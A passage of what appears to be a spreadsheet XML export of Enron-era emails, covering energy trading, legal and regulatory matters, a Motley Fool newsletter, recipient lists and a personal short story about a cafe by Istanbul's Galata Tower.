 &lt;&lt;April Briefing for CPUC.doc&gt;&gt;_x000D_
_x000D_
Michael_x000D_
--_x000D_
Michael S. Alexander_x000D_
Southern California Edison_x000D_
Energy Supply and Marketing_x000D_
626-302-2029_x000D_
_x000D_
 - April Briefing for CPUC.doc</t>
  </si>
  <si>
    <t>Wed, 20 Sep 2000 09:02:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Pope &amp; Talbot</t>
  </si>
  <si>
    <t>Please draft an ISDA pursuant to the attached worksheet and deliver to Dick _x000D_
Robinson.  Thanks</t>
  </si>
  <si>
    <t>Wed, 22 Nov 2000 10:41:00 -0800 (PST)</t>
  </si>
  <si>
    <t>FoolWatch: 'Tis the Season to Get it For Less</t>
  </si>
  <si>
    <t>__________________________________________________________________x000D_
_x000D_
                        F O O L W A T C H_x000D_
                    Wednesday, November 22, 2000_x000D_
_x000D_
benjamin.rogers@enron.com_x000D_
__________________________________________________________________x000D_
_x000D_
REGISTER TO BECOME A FOOL -- GET FREE STUFF!_x000D_
http://www.fool.com/m.asp?i=209624_x000D_
__________________________________________________________________x000D_
_x000D_
                        Close    Change  %Change_x000D_
_x000D_
            FOOL 50   1,711.74   -34.01  -1.95%_x000D_
            DJIA     10,399.32   -95.18  -0.91%_x000D_
            S&amp;P 500   1,322.36   -24.99  -1.85%_x000D_
            NASDAQ    2,755.34  -116.11  -4.04%_x000D_
            (Numbers as of 5:00 p.m. ET)_x000D_
_x000D_
_x000D_
 SPONSORED BY: Away.com_x000D_
 Discover the world's most extraordinary travel destinations!_x000D_
 Get stunning photos and interesting travel facts delivered_x000D_
 to your inbox. Click for Away.com's Daily Escape newsletter!_x000D_
      http://www.lnksrv.com/m.asp?i=209625_x000D_
_x000D_
_x000D_
SPECIAL: 'TIS THE SEASON..._x000D_
  For shopping, planning, giving, and traveling. Cover all the_x000D_
  bases in our holiday special._x000D_
http://www.fool.com/m.asp?i=209626_x000D_
_x000D_
FOOLANTHROPY 2000: OUR CHARITY DRIVE LAUNCHES_x000D_
  Learn about the five charities selected and give with other_x000D_
  Fools this holiday season._x000D_
http://www.fool.com/m.asp?i=209627_x000D_
_x000D_
DUELING FOOLS: ARIBA VS. COMMERCE ONE_x000D_
  If B2B savings lead to greater profits, does Ariba have the_x000D_
  advantage over Commerce One?_x000D_
http://www.fool.com/m.asp?i=209628_x000D_
_x000D_
RULE BREAKER: HELP OTHERS GIVE THANKS_x000D_
  If you're tired of giving thanks every year, consider helping_x000D_
  us give people living in poverty some amazing things to be_x000D_
  thankful for._x000D_
http://www.fool.com/m.asp?i=209629_x000D_
_x000D_
RULE MAKER: PFIZER WORKING THAT WORKING CAPITAL_x000D_
  Phil Weiss questions whether Pfizer is too focused on the_x000D_
  accounting bottom line._x000D_
http://www.fool.com/m.asp?i=209630_x000D_
_x000D_
FOOL ON THE HILL: BUY, SELL, OR HOLD?_x000D_
  Bill Mann comments on the election, the Internet,_x000D_
  and Wall Street analysts._x000D_
http://www.fool.com/m.asp?i=209631_x000D_
_x000D_
DRIP PORT: SKY FALLS ON NORTEL?_x000D_
  George Runkle analyzes why the networking giant's price dropped_x000D_
  last week._x000D_
http://www.fool.com/m.asp?i=209632_x000D_
_x000D_
QUICKNEWS: TOP STORIES_x000D_
  Get the latest on Cree, AT&amp;T Wireless, and Intuit._x000D_
http://www.fool.com/m.asp?i=209633_x000D_
_x000D_
FOOL PLATE SPECIAL: TOLLBOOTHS ON THE INFORMATION HIGHWAY?_x000D_
  Is free online content on the endangered species list?_x000D_
http://www.fool.com/m.asp?i=209634_x000D_
_x000D_
COMMUNITY: HOT TOPICS_x000D_
  Join the discussions on 3Dfx, Broadcom, and Rambus._x000D_
http://www.fool.com/m.asp?i=209635_x000D_
_x000D_
FRIBBLE: A FOOL'S MISSION TO CHINA_x000D_
  A U.S. Fool goes to China and comes back with a greater_x000D_
  appreciation of both countries._x000D_
http://www.fool.com/m.asp?i=209636_x000D_
_x000D_
BREAKFAST WITH THE FOOL: COKE LOSES ITS FIZZ FOR QUAKER_x000D_
  Coke's board says "no thanks" to the Quaker Oats deal. Who's_x000D_
  next in line?_x000D_
http://www.fool.com/m.asp?i=209637_x000D_
_x000D_
__________________________________________________________________x000D_
_x000D_
My Portfolio: http://www.fool.com/m.asp?i=209638_x000D_
My Discussion Boards: http://www.fool.com/m.asp?i=209639_x000D_
My Fool: http://www.fool.com/m.asp?i=209640_x000D_
Fool.com Home: http://www.fool.com/m.asp?i=209641_x000D_
My E-Mail Settings: http://www.fool.com/m.asp?i=209642_x000D_
_x000D_
_x000D_
 SPONSORED BY: Away.com_x000D_
 Discover the world's most extraordinary travel destinations!_x000D_
 Get stunning photos and interesting travel facts delivered_x000D_
 to your inbox. Click for Away.com's Daily Escape newsletter!_x000D_
      http://www.lnksrv.com/m.asp?i=209643_x000D_
_x000D_
_x000D_
17 INDUSTRIES WORTH A LOOK_x000D_
 See which industries our writers think_x000D_
 will be hot next year with Industry Focus 2001._x000D_
http://www.lnksrv.com/m.asp?i=209644_x000D_
_x000D_
FREE BOOK FOR FOOLS ONLY!_x000D_
 Investor's Business Daily will send you a free copy_x000D_
 of 24 Essential Lessons for Investment Success when_x000D_
 you sign up for a free trial subscription of their newspaper._x000D_
http://www.lnksrv.com/m.asp?i=209645_x000D_
_x000D_
FOOL DIRECT E-MAIL SERVICES_x000D_
 Need to change your address or unsubscribe? You_x000D_
 can also temporarily suspend mail delivery._x000D_
http://www.fool.com/community/freemail/freemaillogin.asp?email=benjamin.rogers_x000D_
@enron.com_x000D_
_x000D_
 Have ideas about how we can improve the Fool Direct or new_x000D_
 e-mail products you'd like to see? Try our discussion board:_x000D_
http://www.fool.com/m.asp?i=209646_x000D_
_x000D_
__________________________________________________________________x000D_
(c) Copyright 2000, The Motley Fool. All rights reserved. This_x000D_
material is for personal use only. Republication and_x000D_
redissemination, including posting to news groups, is expressly_x000D_
prohibited without the prior written consent of The Motley Fool._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
MsgId: _x000D_
msg-24347-2000-11-22_18-03-32-6501244_1_Plain_MessageAddress.msg-18:24:41(11-2_x000D_
2-2000)_x000D_
X-Version: mailer-sender-master,v 1.84_x000D_
X-Version: mailer-sender-daemon,v 1.84_x000D_
Message-Recipient: benjamin.rogers@enron.com</t>
  </si>
  <si>
    <t>Sat, 27 Feb 1999 22:30:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'jeff.skilling@enron.com', 'meyerjames@usa.net', 'm_larnold@sprynet.com', 'joguti@aol.com', 'c.combs@intershop.com', 'dlmackler@worldnet.att.net', 'sras@lycosmail.com', 'pwc1@aol.com', 'khuber@hcmwealth.com', 'clowes@email.msn.com', 'katekross@aol.com', 'ksbiehl@hotmail.com', 'ermak@gte.net', 'daveroche@aol.com', 'bjmackaysmith@hotmail.com', 'dwood@rwblaw.com', 'clowes@cmithlaw.com', 'mmmmisha@ix.netcom.com', 'audryn@mindspring.com', 'tskilling@tribune.com', 'hazerfen@hotmail.com', 'eisenbachrl@cooley.com', 'brent@provdiv.ttm.bg', 'mwf15@columbia.edu', 'deniz.razon@abbott.com', 'smackarnes@aol.com', 'mshachat@aol.com', 'tomskilljr@aol.com', 'majalinda@hotmail.com', 'samjstokes@aol.com', 'milobenn@sirius.com', 'cjones@cityofnapa.org', 'mark.langermann@issna.com', 'martin@sbu.edu', 'candc@ix.netcom.com', 'doyna@coffeenet.com', 'transwd@aol.com'})</t>
  </si>
  <si>
    <t>Howdy.  The below was originally the (false) start of a short story, but_x000D_
quickly metamorphisized into something close to autobiography.  Some of_x000D_
the original atmospherics have lingered, and don't necessarily reflect_x000D_
anything about yours truly.  Later._x000D_
_x000D_
At The Galata Tower Cafe_x000D_
_x000D_
Cigarette smoke, ignoring the lazy sweep of an old ceiling fan, hangs in_x000D_
the air above me.  It seems to mock my obsessive, rambling thoughts_x000D_
about teaching and writing and learning Turkish and, of course, HER._x000D_
"Take it easy", it says with a smirk.  "Relax."  A phony look of concern_x000D_
clouds it further.  "What about taking a deep breath?"  Surreptitiously_x000D_
(I think), I take in the recommended breath, but the smoke has drifted_x000D_
in closer, notices.  "There!  Isn't that better?"_x000D_
_x000D_
"No", I say to myself.  (Don't worry, I am not so far gone as to take_x000D_
this internal dialogue thing outside.)  I flick my hand through one_x000D_
particularly annoying cloud of the stuff.  "Now get lost!"_x000D_
_x000D_
Outside, at the base of the ancient Galata Tower, kids on their way home_x000D_
from school set off an M-80.  I flinch at the explosion, which is_x000D_
amplified by the tight dimensions of the square and the old stone walls_x000D_
surrounding it.  The square itself, left in a premature dusk by the huge_x000D_
tower's shadow, is temporarily emptied of the teenaged mob.  I stare out_x000D_
the window into the gloom.  Though only the bottom few meters yards of_x000D_
the tower are visible to me, I am aware of its tremendous bulk.  The_x000D_
tower, first built by the Genoese in the 1300's, dominates my entire_x000D_
neighborhood, the Kuledibi.  It should remind us all, I suppose, of the_x000D_
durability of stone and dirt, and of the significantly less impressive_x000D_
characteristics of flesh and blood.  Day and night (amused, perhaps, by_x000D_
the slim activity of this generation's version of flesh and blood?), it_x000D_
stands obdurate, unmoved, like the leg of a giant one dare not disturb._x000D_
_x000D_
Emboldened by the lack of any official response to the bombing,_x000D_
one-by-one the would be terrorists (or freedom fighters; who's to say?)_x000D_
drift back into the square.  I suspect the tower isn't nearly half as_x000D_
bothered by these kid's budding pyromania as me, since it has no doubt_x000D_
been subject to much more serious attacks during its 700 or so year_x000D_
history.  Seeing that no adult has stormed into the square to_x000D_
re-establish order, I brace myself for another blast.  Maybe I'm the_x000D_
only one who really minds.  Every male in this country does have to_x000D_
serve in the army for eighteen months.  Perhaps the noise doesn't bother_x000D_
them, or maybe they see that this rather serious version of child's play_x000D_
has a practical side to it, giving the kids a head start on basic_x000D_
training._x000D_
_x000D_
I am surprised to discover that the waiter, Yusuf, is standing next to_x000D_
me. He has his head thrown back slightly, a gesture that has become, for_x000D_
my benefit, his version of the question "More tea?"  (He has given up on_x000D_
words, as the ones he knows still don't much match the ones I know.)_x000D_
_x000D_
"Evet, cay lutfen.  Bir az sutlu, lutfen. [Yes, tea please.  With a_x000D_
little milk, please.]"  (Never would have guessed that, huh.  And yes, I_x000D_
agree  [and have been told before] too many "lutfens".  There are_x000D_
probably other mistakes too, but my words seem to get the job done._x000D_
I'll work on perfecting them, "sonra [later]".)_x000D_
_x000D_
 Yusuf nods, walks away._x000D_
_x000D_
I realize I have my head bent forward, a subconscious adjustment I must_x000D_
have made to dodge some of the smoke.  I see a cat under one of the_x000D_
tables looking up at me.  It opens its mouth for what I figure is the_x000D_
beginning of a yawn.  But, instead, it emits a strange, high-pitched_x000D_
wail, sounding more like a bird than a cat.  Embarrassed for the poor_x000D_
thing, I look away._x000D_
_x000D_
For maybe the first time since I have been coming to this cafe, I take a_x000D_
close look around.  (I must be getting more comfortable. "Dikkat! [Watch_x000D_
out!]")  There are very few other people in the cafe, which is_x000D_
surprising, given the amount of smoke.  They are all sitting alone,_x000D_
their heads, like mine, bent forward.  I suspect that boredom, however_x000D_
-- and not the smoke -- is the proximate cause._x000D_
_x000D_
Every table is covered with green felt table clothes, all of which are_x000D_
seriously spotted with tea stains and cigarette burns.  In the middle of_x000D_
each table, looking like a tiny shrunken crown, is a silver ashtray._x000D_
_x000D_
Above the kitchen, which is squeezed unnecessarily tight into a corner_x000D_
of the otherwise spacious caf?, hangs a huge painting of a beach scene_x000D_
from somewhere in the Pacific.  Once no doubt bright and evocative, it_x000D_
has aged and has now almost completely blended into and disappeared_x000D_
amongst the dull wood panels covering the top half of the room.  The_x000D_
green of the palm trees lining the beach is now so dark it is_x000D_
approaching black.  The sand, probably once pure white, is the color of_x000D_
the mud in the streets outside and the sea close to the color of the tea_x000D_
served here. There are several boats pictured, all pulled up onto the_x000D_
sand, but they are now no more than ghosts and, indeed, look as if_x000D_
someone may have tried to erase them.  The painting is as changed and_x000D_
distorted as the dreams of those who sit below it absent-mindedly_x000D_
stirring their tea, their feet crammed into shoes stiff from having_x000D_
walked through too much winter rain, their fingernails having long ago_x000D_
surrendered to the dirt now permanently built up under them, wearing_x000D_
clothes that didn't smell so bad this morning they couldn't be worn just_x000D_
one more day, drinking the cheap tea they can scarcely afford, dreaming_x000D_
perhaps of little more than an early spring._x000D_
_x000D_
I sit up in my chair, let my head fall back, take in a deep breath and,_x000D_
surprisingly, begin to relax._x000D_
_x000D_
_______________________________________________________x000D_
Get Your Private, Free Email at http://www.hotmail.com</t>
  </si>
  <si>
    <t>Fri, 2 Feb 2001 06:43:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'susan.scott@enron.com', 'jeffrey.gossett@enron.com', 'sally.beck@enron.com', 'errol.mclaughlin@enron.com'})</t>
  </si>
  <si>
    <t>re: book admin for Pipe/Gas daily option book</t>
  </si>
  <si>
    <t>As you might be aware,  Susan Scott (the book admin for the pipe option book) _x000D_
was forced by system problems to stay all night Wednesday night and until 200 _x000D_
am Friday  in order to calc my book.  While she is scheduled to rotate to the _x000D_
West desk soon,  I think we need to discuss putting two persons on my book in _x000D_
order to bring the work load to a sustainable level.  I'd like to meet at _x000D_
2:30 pm on Monday to discuss this issue.  Please let me know if this time _x000D_
fits in your schedules._x000D_
_x000D_
Thanks,_x000D_
_x000D_
Larry</t>
  </si>
  <si>
    <t>Sun, 13 Jan 2002 22:31:40 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'f..calger@enron.com', 'louise.kitchen@enron.com', 'john.lavorato@enron.com', 'david.oxley@enron.com'})</t>
  </si>
  <si>
    <t>Re: NETCo HR team</t>
  </si>
  <si>
    <t>Let's take this up when chris and I are in houston.  If pssible, I'd like to get amy's opinion._x000D_
_x000D_
Tim_x000D_
_x000D_
--------------------------_x000D_
Sent from my BlackBerry Wireless Handheld (www.BlackBerry.net)</t>
  </si>
  <si>
    <t>Wed, 23 Feb 2000 09:42:00 -0800 (PST)</t>
  </si>
  <si>
    <t>positively - how about early monday?_x000D_
take care_x000D_
Elizabeth</t>
  </si>
  <si>
    <t>Thu, 14 Dec 2000 02:08:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'keith.holst@enron.com', 'mike.grigsby@enron.com'})</t>
  </si>
  <si>
    <t xml:space="preserve">---------------------- Forwarded by Phillip K Allen/HOU/ECT on 12/14/2000 _x000D_
10:06 AM ---------------------------_x000D_
From: Sarah Novosel@ENRON on 12/13/2000 04:39 PM CST_x000D_
To: Steven J Kean/NA/Enron@Enron, Richard Shapiro/NA/Enron@Enron, James D _x000D_
Steffes/NA/Enron@Enron, Jeff Dasovich/NA/Enron@Enron, Susan J _x000D_
Mara/NA/Enron@ENRON, Paul Kaufman/PDX/ECT@ECT, Phillip K Allen/HOU/ECT@ECT, _x000D_
Mary Hain/HOU/ECT@ECT, Christi L Nicolay/HOU/ECT@ECT, Donna _x000D_
Fulton/Corp/Enron@ENRON, Joe Hartsoe/Corp/Enron@ENRON, Shelley _x000D_
Corman/ET&amp;S/Enron@ENRON_x000D_
cc:  _x000D_
Subject: Final FIled Version_x000D_
_x000D_
_x000D_
----- Forwarded by Sarah Novosel/Corp/Enron on 12/13/2000 05:35 PM -----_x000D_
_x000D_
	"Randall Rich" &lt;rrich@bracepatt.com&gt;_x000D_
	12/13/2000 05:13 PM_x000D_
		 _x000D_
		 To: "Jeffrey Watkiss" &lt;dwatkiss@bracepatt.com&gt;, &lt;jhartso@enron.com&gt;, _x000D_
&lt;jsteffe@enron.com&gt;, &lt;llawner@enron.com&gt;, &lt;rebecca.w.cantrell@enron.com&gt;, _x000D_
&lt;Richard.b.sanders@enron.com&gt;, &lt;snovose@enron.com&gt;_x000D_
		 cc: _x000D_
		 Subject: Final FIled Version_x000D_
_x000D_
_x000D_
The filed version of the comments in the San Diego Gas &amp; Electric matter at _x000D_
FERC is attached._x000D_
_x000D_
 - SANDIEGO.DOC_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Tue, 13 Nov 2001 13:59:54 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'l..funk@enron.com', 'janet.place@enron.com', 'elizabeth.labanowski@enron.com', 'jim.armogida@enron.com', 'john.novak@enron.com', 'rob.walls@enron.com', 'clement.abrams@enron.com', 'drew.fossum@enron.com', 'e..haedicke@enron.com', 'legal &lt;.taylor@enron.com&gt;', 'jordan.mintz@enron.com', 'gareth.bahlmann@enron.com', 'melinda.winn@enron.com', 'vicki.sharp@enron.com', 'marc.manly@enron.com', 'alan.aronowitz@enron.com', 'john.ale@enron.com', 'robert.eickenroht@enron.com', 'rex.rogers@enron.com', 'gina.karathanos@enron.com', 'eric.newell@enron.com', 'stephen.wallace@enron.com'})</t>
  </si>
  <si>
    <t>Board of Directors Meeting - December 11, 2001</t>
  </si>
  <si>
    <t xml:space="preserve"> _x000D_
_x000D_
Kelly M. Johnson_x000D_
Executive Assistant_x000D_
Enron Corp._x000D_
Tel: 713-853-6485_x000D_
Fax: 713-853-2534_x000D_
E-Mail: kelly.johnson@enron.com_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Sun, 22 Apr 2001 05:17:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Re: FW: Enron matter</t>
  </si>
  <si>
    <t xml:space="preserve">I will hold off on contacting Charles Bone, the influential Ten. atty we _x000D_
talked about, until I hear from you that we need him to call the Ten. AG._x000D_
_x000D_
_x000D_
_x000D_
	Lisa Mellencamp_x000D_
	04/20/2001 01:58 PM_x000D_
		 _x000D_
		 To: James Derrick/Enron@EnronXGate, Mark E Haedicke/HOU/ECT@ECT, Richard B _x000D_
Sanders/HOU/ECT@ECT, Travis McCullough/HOU/ECT@ECT, Elizabeth _x000D_
Sager/HOU/ECT@ECT, Vicki Sharp/HOU/EES@EES_x000D_
		 cc: _x000D_
		 Subject: FW: Enron matter_x000D_
_x000D_
FYI. i will correct number/title re me with greene by phone and discuss any _x000D_
issues he has._x000D_
_x000D_
_x000D_
Lisa J. Mellencamp_x000D_
Enron North America Corp. - Legal_x000D_
1400 Smith St._x000D_
Houston, TX  77002_x000D_
Tel:  (713) 853-7986_x000D_
Fax: (713) 646-3393_x000D_
E-mail:  Lisa.Mellencamp@enron.com_x000D_
----- Forwarded by Lisa Mellencamp/HOU/ECT on 04/20/2001 01:56 PM -----_x000D_
_x000D_
	PAronzon@milbank.com_x000D_
	04/20/2001 01:35 PM_x000D_
		 _x000D_
		 To: lisa.mellencamp@enron.com_x000D_
		 cc: _x000D_
		 Subject: FW: Enron matter_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
FYI. _x000D_
-----Original Message----- _x000D_
From: Bernard W. Greene [mailto:bgreene2@mail.state.tn.us] _x000D_
Sent: Thursday, April 19, 2001 2:32 PM _x000D_
To: Paronzon@milbank.com _x000D_
Subject: Enron matter _x000D_
_x000D_
I have been asked to verify my understanding of Milbank's relationship with _x000D_
Enron for a group of Pacific Gas creditors with whom TN has been in _x000D_
discussions.? I sent them the following this afternoon:_x000D_
_x000D_
I spoke with Paul Aronzon, the lead Milbank Tweed partner on the creditors _x000D_
committee engagement.? Aronzon said that Milbank Tweed does not represent _x000D_
Enron as general counsel or in any other significant capacity.? Enron uses _x000D_
Texas counsel when needed, but mostly relies on its very large inhouse legal _x000D_
staff.? Milbank Tweed has a large energy practice and works on transactions _x000D_
with Enron as lenders counsel, as counsel to entities in which Enron owns an _x000D_
equity interest and as outside counsel on isolated bankruptcy matters with _x000D_
Enron's in-house legal staff.? Aronzon said that if anyone has further _x000D_
questions regarding Milbank Tweed's relationship with Enron they can contact _x000D_
him directly (213-892-4377) or Lisa Mellencamp, Enron's general counsel (I _x000D_
believe that she can be reached at 713-853-3820).? Milbank Tweed will also be _x000D_
filing an application with the court, in connection with its representation _x000D_
of the unsecured creditors committee, which will list all potential _x000D_
conflicts.? This should be available on the court's web page - -? _x000D_
http://www.canb.uscourts.gov/canb/Documents.nsf? _x000D_
_x000D_
in the next few days.? _x000D_
_x000D_
This e-mail message may contain legally privileged and/or confidential _x000D_
information. If you are not the intended recipient(s), or the employee _x000D_
or agent responsible for delivery of this message to the intended _x000D_
recipient(s), you are hereby notified that any dissemination, _x000D_
distribution or copying of this e-mail message is strictly prohibited. _x000D_
If you have received this message in error, please immediately notify _x000D_
the sender and delete this e-mail message from your computer. _x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Thu, 11 Jan 2001 14:42:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'travis.mccullough@enron.com', 'alan.comnes@enron.com', 'linda.robertson@enron.com', 'tim.belden@enron.com', 'william.bradford@enron.com', 'donna.fulton@enron.com', 'robert.badeer@enron.com', 'gordon.savage@enron.com', 'sarah.novosel@enron.com', 'mary.hain@enron.com', 'stephen.swain@enron.com', 'don.black@enron.com', 'andre.cangucu@enron.com', 'michael.tribolet@enron.com', 'paul.kaufman@enron.com', 'shelia.benke@enron.com', 'susan.mara@enron.com', 'richard.shapiro@enron.com', 'scott.stoness@enron.com', 'steven.kean@enron.com', 'harry.kingerski@enron.com', 'roger.yang@enron.com', 'wanda.curry@enron.com', 'vicki.sharp@enron.com', 'jeff.dasovich@enron.com', 'sandra.mccubbin@enron.com', 'mark.palmer@enron.com', 'joe.hartsoe@enron.com'})</t>
  </si>
  <si>
    <t>Financial Analysis of PG&amp;E and Proposed Terms for Settlement</t>
  </si>
  <si>
    <t xml:space="preserve">Attached please find three documents that outlines the economics of LT _x000D_
contracting necessary for PG&amp;E and SCE.  Also find some thoughts on elements _x000D_
of a workable settlement._x000D_
_x000D_
Call me with any questions._x000D_
_x000D_
Jim_x000D_
</t>
  </si>
  <si>
    <t>Thu, 31 Aug 2000 11:38:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'jim.schwieger@enron.com', 'phillip.allen@enron.com', 'scott.neal@enron.com', 'hunter.shively@enron.com', 'thomas.martin@enron.com', 'fletcher.sturm@enron.com', 'john.arnold@enron.com'})</t>
  </si>
  <si>
    <t>Change in Correlations for VaR 08/31/00</t>
  </si>
  <si>
    <t xml:space="preserve">Attached is the latest correlation matrix being used in VaR (08/31/00).  As _x000D_
expected, correlations between NYMEX and SoCal weaken, moving from 87% to 82% _x000D_
, Malin tightened from 94% to 96%, Rockies from 94% to 99%, ElPaso SJ from _x000D_
94% to 98%, Permian from 99% to 1, AECO from 96% to 97%.  _x000D_
_x000D_
The most significant change in correlations came from SoCal.  The old factor _x000D_
loading had SoCal/Rockies 95% correlated, today it is in the system as 74%.  _x000D_
The SoCal/San Juan relationship fell apart moving from 98% to 75%. SoCal/AECO _x000D_
from 95% to 76%, SoCal/Permian from 92% to 82%.  Additionally, note that _x000D_
IF-HeHub was dropped as a primary curve and Transco Z6 was added as a primary _x000D_
curve._x000D_
Thanks,_x000D_
Frank_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Mon, 10 Apr 2000 02:15:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'chris.germany@enron.com', 'mary.franklin@enron.com'})</t>
  </si>
  <si>
    <t>CNG Form Letter</t>
  </si>
  <si>
    <t>Here is the letter and an attachment that you will need to complete to move _x000D_
the CNG meters from the CES' pools to ENA's pools.  There are some _x000D_
highlighted notes that I put on the letter that tells you what you need to _x000D_
do.    You will probably just want to attach a spreadsheet list of the meters _x000D_
that you are moving for each letter.  The list will need to include the _x000D_
producer information also.  You will need to do one of these letters for all _x000D_
the agg point pools.  I filled out everything for you on the attachment all _x000D_
you need to do is make sure you attach the appropriate list of meters._x000D_
_x000D_
Please call me if you have any questions.  (614) 718-6340_x000D_
_x000D_
_x000D_
_x000D_
Thanks,_x000D_
Heidi</t>
  </si>
  <si>
    <t>Mon, 18 Sep 2000 07:25:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>are the softball games tues nights?  when do they start? where are they?  i _x000D_
need to tell that chick.</t>
  </si>
  <si>
    <t>Fri, 2 Jun 2000 04:00:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'janet.wallis@enron.com', 'jackie.young@enron.com'})</t>
  </si>
  <si>
    <t>Re: 98-1601</t>
  </si>
  <si>
    <t xml:space="preserve">Done._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Janet H Wallis_x000D_
06/02/2000 10:23 AM_x000D_
To: dfarmer@enron.com_x000D_
cc: pam.leigh@southernunionco.com _x000D_
Subject: 98-1601_x000D_
_x000D_
Please extend the sale at Lockhart  to Southern Union for two extra days at _x000D_
the same price._x000D_
_x000D_
Thank you,_x000D_
Janet_x000D_
---------------------- Forwarded by Janet H Wallis/HOU/ECT on 06/02/2000 _x000D_
10:16 AM ---------------------------_x000D_
_x000D_
_x000D_
Jackie Young_x000D_
06/02/2000 09:32 AM_x000D_
To: Janet H Wallis/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: 98-1601_x000D_
_x000D_
Can you please extend deal #254839 to cover flow for 5/20 and 5/21?  On the _x000D_
20th, 578 decatherms flowed.  On the 21st, 109 decatherms flowed._x000D_
_x000D_
Thanks_x000D_
-Jackie-_x000D_
3-9497_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Wed, 21 Mar 2001 04:30:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Commodity Futures Modernization Act</t>
  </si>
  <si>
    <t xml:space="preserve">Do we have an outside counsel memorandum, or will we have an internal one _x000D_
soon, that we can send to Martin (as well as the other non-US swap lawyers)?_x000D_
----- Forwarded by Tana Jones/HOU/ECT on 03/21/2001 12:25 PM -----_x000D_
_x000D_
	Elizabeth Sager_x000D_
	03/21/2001 11:58 AM_x000D_
		 _x000D_
		 To: Tana Jones/HOU/ECT@ECT_x000D_
		 cc: _x000D_
		 Subject: Commodity Futures Modernization Act_x000D_
_x000D_
can you help Martin w this_x000D_
_x000D_
thanks_x000D_
----- Forwarded by Elizabeth Sager/HOU/ECT on 03/21/2001 11:57 AM -----_x000D_
_x000D_
	Martin Rosell_x000D_
	03/18/2001 09:58 AM_x000D_
		 _x000D_
		 To: Elizabeth Sager/HOU/ECT@ECT_x000D_
		 cc: _x000D_
		 Subject: Commodity Futures Modernization Act_x000D_
_x000D_
Elisabeth:_x000D_
_x000D_
I read an article in a law magazine about the captioned Act and it was, among _x000D_
other things, stated therein that CFTC under the Act had been deprived of its _x000D_
jurisdiction over swaps (other than those related to agricultural products) _x000D_
made by eligible contracts participants.  Since the Oslo office trades _x000D_
through ECTRIC, I wonder whether this new piece of legislation has an impact _x000D_
on our standard reps relating to the "trade options exemption" and as to the _x000D_
parties being "eligible swap participants" (are they still required)?  Is _x000D_
there any internal memo yet prepared on the Act and its implications?_x000D_
_x000D_
Martin_x000D_
</t>
  </si>
  <si>
    <t>Michelle Cash - Re:  Employment Matters</t>
  </si>
  <si>
    <t>Assistant:  Twanda Sweet - ext. 3-9402</t>
  </si>
  <si>
    <t>Mon, 24 May 1999 11:16:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>A reminder</t>
  </si>
  <si>
    <t>Just a reminder that I'm going to be in a little late tomorrow.  I'm going _x000D_
over to the old TCB Bank bldg. at 9:00am to sign my loan papers.</t>
  </si>
  <si>
    <t>Wed, 28 Jun 2000 09:28:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Re: Next visit to Houston</t>
  </si>
  <si>
    <t xml:space="preserve">Ed,_x000D_
_x000D_
I shall be available on both days. What about Wednesday,_x000D_
July 12, between 1:30 and 4:00. Please, let me know_x000D_
what time would work for you._x000D_
_x000D_
It will be nice to see you again._x000D_
_x000D_
Vince_x000D_
_x000D_
P.S. By the way, did you have a chance to take a look at the EOL?_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
"Edward Krapels" &lt;ekrapels@esaibos.com&gt; on 06/28/2000 02:49:41 PM_x000D_
Please respond to ekrapels@esaibos.com_x000D_
To: Vince J Kaminski/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: Next visit to Houston_x000D_
_x000D_
_x000D_
_x000D_
Dear Vince,_x000D_
_x000D_
I will be returning to Houston during the  week of July 10._x000D_
_x000D_
ESAI and Weather Services International have launched -- after more than 18_x000D_
months of R&amp;D --  our service, called Energycast Power Trader and Energycast_x000D_
Gas Trader, for power traders in Nepool and PJM. I would be happy to review_x000D_
the service with you as well as take you on a tour of our web site. Are you_x000D_
available on July 12 - 13?_x000D_
_x000D_
Sincerely,_x000D_
_x000D_
Ed Krapels_x000D_
_x000D_
_x000D_
_x000D_
 - 61900_WSIESAI_Energycast.doc_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Mon, 8 Nov 1999 03:47:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Re: Referral of 1500 MW Project to Enron NA</t>
  </si>
  <si>
    <t>Thanks for the heads up!  Mark</t>
  </si>
  <si>
    <t>Tue, 29 May 2001 07:50:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Re: 2- SURVEY/INFORMATION EMAIL May 30th</t>
  </si>
  <si>
    <t xml:space="preserve">Please see below information for Stan Horton._x000D_
_x000D_
_x000D_
   _x000D_
                        	_x000D_
	Enron Technology_x000D_
	_x000D_
	From:  Outlook Migration Team                           05/24/2001 04:59 PM_x000D_
	_x000D_
_x000D_
To: Jan Bass/NA/Enron@Enron, Steve Sauer/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, _x000D_
Amy Clemons/Corp/Enron@ENRON, Audrey Cook/HOU/ECT@ECT, Elsie Lew/HOU/ECT@ECT, _x000D_
Joy Werner/Corp/Enron@ENRON, Kim Durham/HOU/ECT@ECT, Leslie _x000D_
